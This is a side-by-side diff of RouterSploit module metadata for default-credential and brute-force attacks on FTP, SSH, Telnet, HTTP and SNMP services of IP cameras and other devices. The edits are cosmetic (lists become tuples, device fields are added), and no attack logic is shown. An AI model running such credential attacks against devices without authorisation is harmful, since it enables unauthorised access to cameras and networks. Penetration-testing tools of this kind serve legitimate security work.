target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Honeywell Camera Default FTP Creds", "name": "Honeywell Camera Default FTP Creds",
"description": "Module performs dictionary attack against Honeywell Camera FTP service. " "description": "Module performs dictionary attack against Honeywell Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Honeywell Camera", "Honeywell Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Honeywell Camera Default SSH Creds", "name": "Honeywell Camera Default SSH Creds",
"description": "Module performs dictionary attack against Honeywell Camera SSH service. " "description": "Module performs dictionary attack against Honeywell Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Honeywell Camera", "Honeywell Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Honeywell Camera Default Telnet Creds", "name": "Honeywell Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Honeywell Camera Telnet service. " "description": "Module performs dictionary attack against Honeywell Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Honeywell Camera", "Honeywell Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "IQInvision Camera Default FTP Creds", "name": "IQInvision Camera Default FTP Creds",
"description": "Module performs dictionary attack against IQInvision Camera FTP service. " "description": "Module performs dictionary attack against IQInvision Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"IQInvision Camera", "IQInvision Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "IQInvision Camera Default SSH Creds", "name": "IQInvision Camera Default SSH Creds",
"description": "Module performs dictionary attack against IQInvision Camera SSH service. " "description": "Module performs dictionary attack against IQInvision Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"IQInvision Camera", "IQInvision Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "IQInvision Camera Default Telnet Creds", "name": "IQInvision Camera Default Telnet Creds",
"description": "Module performs dictioanry attack against IQInvision Camera Telnet service. " "description": "Module performs dictioanry attack against IQInvision Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com", # routersploit module "Marcin Bury <marcin[at]threat9.com", # routersploit module
], ),
"devices": [ "devices": (
"IQInvision Camera", "IQInvision Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "JVC Camera Default FTP Creds", "name": "JVC Camera Default FTP Creds",
"description": "Module performs dictionary attack against JVC Camera FTP service. " "description": "Module performs dictionary attack against JVC Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"JVC Camera", "JVC Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "JVC Camera Default SSH Creds", "name": "JVC Camera Default SSH Creds",
"description": "Module performs dictionary attack against JVC Camera SSH service. " "description": "Module performs dictionary attack against JVC Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"JVC Camera", "JVC Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "JVC Camera Default Telnet Creds", "name": "JVC Camera Default Telnet Creds",
"description": "Module performs dictionary attack against JVC Camera Telnet service. " "description": "Module performs dictionary attack against JVC Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"JVC Camera", "JVC Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Mobotix Camera Default FTP Creds", "name": "Mobotix Camera Default FTP Creds",
"description": "Module performs dictionary attack against Mobotix Camera FTP service. " "description": "Module performs dictionary attack against Mobotix Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Mobotix Camera", "Mobotix Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Mobotix Camera Default SSH Creds", "name": "Mobotix Camera Default SSH Creds",
"description": "Module performs dictionary attack against Mobotix Camera SSH service. " "description": "Module performs dictionary attack against Mobotix Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Mobotix Camera", "Mobotix Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Mobitix Camer Default Telnet Creds", "name": "Mobitix Camer Default Telnet Creds",
"description": "Module performs dictionary attack against Mobitix Camera Telnet service. " "description": "Module performs dictionary attack against Mobitix Camera Telnet service. "
"If valid credentials are found, they are displayed tot he user.", "If valid credentials are found, they are displayed tot he user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Mobotix Camera", "Mobotix Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Samsung Camera Default FTP Creds", "name": "Samsung Camera Default FTP Creds",
"description": "Module performs dictionary attack against Samsung Camer FTP service. " "description": "Module performs dictionary attack against Samsung Camer FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Samsung Camera", "Samsung Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Samsung Camera Default SSH Creds", "name": "Samsung Camera Default SSH Creds",
"description": "Module perfroms dictionary attack against Samsung Camera SSH service. " "description": "Module perfroms dictionary attack against Samsung Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Samsung Camera", "Samsung Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Samsung Camera Default Telnet Creds", "name": "Samsung Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Samsung Camera Telnet service. " "description": "Module performs dictionary attack against Samsung Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Samsung Camera", "Samsung Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Sentry360 Camera Default FTP Creds", "name": "Sentry360 Camera Default FTP Creds",
"description": "Module performs dictionary attack against Sentry360 Camera FTP service. " "description": "Module performs dictionary attack against Sentry360 Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Sentry360 Camera", "Sentry360 Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Sentry360 Camera Default SSH Creds", "name": "Sentry360 Camera Default SSH Creds",
"description": "Module performs dictionary attack against Sentry360 Camera SSH service. " "description": "Module performs dictionary attack against Sentry360 Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit "Marcin Bury <marcin[at]threat9.com>", # routersploit
], ),
"devices": [ "devices": (
"Sentry360 Camera", "Sentry360 Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Sentry360 Camera Default Telnet Creds", "name": "Sentry360 Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Sentry360 Camera Telnet service. " "description": "Module performs dictionary attack against Sentry360 Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Sentry360 Camera", "Sentry360 Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Siemens Camera Default FTP Creds", "name": "Siemens Camera Default FTP Creds",
"description": "Module performs dictionary attack against Siemens Camera FTP service. " "description": "Module performs dictionary attack against Siemens Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Siemens Camera", "Siemens Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Siemens Camera Default SSH Creds", "name": "Siemens Camera Default SSH Creds",
"description": "Module performs dictionary attack against Siemens Camera SSH service. " "description": "Module performs dictionary attack against Siemens Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Siemens Camera", "Siemens Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Siemens Camera Default Telnet Creds", "name": "Siemens Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Siemens Camera Telnet service. " "description": "Module performs dictionary attack against Siemens Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Siemens Camera", "Siemens Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Speco Camera Default FTP Creds", "name": "Speco Camera Default FTP Creds",
"description": "Module performs dictionary attack against Speco Camera FTP service. " "description": "Module performs dictionary attack against Speco Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Speco Camera", "Speco Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Speco Camera Default SSH Creds", "name": "Speco Camera Default SSH Creds",
"description": "Module performs dictionary attack against Speco Camera SSH service. " "description": "Module performs dictionary attack against Speco Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Speco Camera", "Speco Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Speco Camera Default Telnet Creds", "name": "Speco Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Speco Camera Telnet service. " "description": "Module performs dictionary attack against Speco Camera Telnet service. "
"If valid credentials are found they are displayed to the user.", "If valid credentials are found they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Speco Camera", "Speco Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Stardot Camera Default FTP Creds", "name": "Stardot Camera Default FTP Creds",
"description": "Module performs dictionary attack against Stardot Camera FTP service. " "description": "Module performs dictionary attack against Stardot Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Stardot Camera", "Stardot Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Stardot Camera Default SSH Creds", "name": "Stardot Camera Default SSH Creds",
"description": "Module performs dictionary attack against Stardot Camera SSH service. " "description": "Module performs dictionary attack against Stardot Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Stardot Camera", "Stardot Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Stardot Camera Default Telnet Creds", "name": "Stardot Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Stardot Camera Telnet service. " "description": "Module performs dictionary attack against Stardot Camera Telnet service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Stardot Camera", "Stardot Camera",
] )
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "Vacron Camera Default FTP Creds", "name": "Vacron Camera Default FTP Creds",
"description": "Module performs dictionary attack against Vacron Camera FTP service. " "description": "Module performs dictionary attack against Vacron Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Vacron Cameras", "Vacron Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "Vacron Camera Default SSH Creds", "name": "Vacron Camera Default SSH Creds",
"description": "Module performs dictionary attack against Vacron Camera SSH service. " "description": "Module performs dictionary attack against Vacron Camera SSH service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Vacron Camera", "Vacron Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "Vacron Camera Default Telnet Creds", "name": "Vacron Camera Default Telnet Creds",
"description": "Module performs dictionary attack against Vacron Camera Telneta service. " "description": "Module performs dictionary attack against Vacron Camera Telneta service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"Vacron Camera", "Vacron Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(FTPDefault): ...@@ -7,12 +7,12 @@ class Exploit(FTPDefault):
"name": "VideoIQ Camera Default FTP Creds", "name": "VideoIQ Camera Default FTP Creds",
"description": "Module performs dictionary attack against VideoIQ Camera FTP service. " "description": "Module performs dictionary attack against VideoIQ Camera FTP service. "
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"VideoIQ Camera", "VideoIQ Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(SSHDefault): ...@@ -7,12 +7,12 @@ class Exploit(SSHDefault):
"name": "VideoIQ Camera Default SSH Creds", "name": "VideoIQ Camera Default SSH Creds",
"description": "Module performs dictionary attack against VideoIQ Camera SSH service." "description": "Module performs dictionary attack against VideoIQ Camera SSH service."
"If valid credentials are found, they are displayed to the user.", "If valid credentials are found, they are displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"VideoIQ Camera", "VideoIQ Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault): ...@@ -7,12 +7,12 @@ class Exploit(TelnetDefault):
"name": "VideoIQ Camera Default Telnet Creds", "name": "VideoIQ Camera Default Telnet Creds",
"description": "Module performs dictionary attack against VideoIQ Camera Telnet service. " "description": "Module performs dictionary attack against VideoIQ Camera Telnet service. "
"If valid credentials are found, they ar displayed to the user.", "If valid credentials are found, they ar displayed to the user.",
"authors": [ "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
], ),
"devices": [ "devices": (
"VideoIQ Cameras", "VideoIQ Camera",
], ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -10,8 +10,11 @@ class Exploit(FTPClient): ...@@ -10,8 +10,11 @@ class Exploit(FTPClient):
"description": "Module performs bruteforce attack against FTP service." "description": "Module performs bruteforce attack against FTP service."
"If valid credentials are found, the are displayed to the user.", "If valid credentials are found, the are displayed to the user.",
"authors": ( "authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
), ),
"devices": (
"Multiple devices",
)
} }
target = OptIP("", "Target IPv4, IPv6 or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 or file with ip:port (file://)")
......
...@@ -9,8 +9,11 @@ class Exploit(FTPClient): ...@@ -9,8 +9,11 @@ class Exploit(FTPClient):
"description": "Module performs dictionary attack with default credentials against FTP service." "description": "Module performs dictionary attack with default credentials against FTP service."
"If valid credentials are found, the are displayed to the user.", "If valid credentials are found, the are displayed to the user.",
"authors": ( "authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
), ),
"devices": (
"Multiple devices",
)
} }
target = OptIP("", "Target IPv4, IPv6 or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 or file with ip:port (file://)")
......
...@@ -13,6 +13,9 @@ class Exploit(HTTPClient): ...@@ -13,6 +13,9 @@ class Exploit(HTTPClient):
"authors": ( "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
"Alexander Yakovlev <https://github.com/toxydose>", # upgrading to perform bruteforce attack against HTTP Digest Auth service "Alexander Yakovlev <https://github.com/toxydose>", # upgrading to perform bruteforce attack against HTTP Digest Auth service
),
"devices": (
"Multiple devices",
) )
} }
......
...@@ -12,6 +12,9 @@ class Exploit(HTTPClient): ...@@ -12,6 +12,9 @@ class Exploit(HTTPClient):
"authors": ( "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
"Alexander Yakovlev <https://github.com/toxydose>", # upgrading to perform bruteforce attack against HTTP Digest Auth service "Alexander Yakovlev <https://github.com/toxydose>", # upgrading to perform bruteforce attack against HTTP Digest Auth service
),
"devices": (
"Multiple devices",
) )
} }
......
...@@ -10,6 +10,9 @@ class Exploit(SNMPClient): ...@@ -10,6 +10,9 @@ class Exploit(SNMPClient):
"If valid community string is found, it is displayed to the user", "If valid community string is found, it is displayed to the user",
"authors": ( "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"devices": (
"Multiple devices",
) )
} }
......
...@@ -12,6 +12,9 @@ class Exploit(SSHClient): ...@@ -12,6 +12,9 @@ class Exploit(SSHClient):
"authors": ( "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
), ),
"devices": (
"Multiple devices",
)
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -11,6 +11,9 @@ class Exploit(SSHClient): ...@@ -11,6 +11,9 @@ class Exploit(SSHClient):
"authors": ( "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
), ),
"devices": (
"Multiple devices",
)
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -12,6 +12,9 @@ class Exploit(TelnetClient): ...@@ -12,6 +12,9 @@ class Exploit(TelnetClient):
"authors": ( "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
), ),
"devices": (
"Multiple devices",
)
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
......
...@@ -11,6 +11,9 @@ class Exploit(TelnetClient): ...@@ -11,6 +11,9 @@ class Exploit(TelnetClient):
"authors": ( "authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module "Marcin Bury <marcin[at]threat9.com>", # routersploit module
), ),
"devices": (
"Multiple devices",
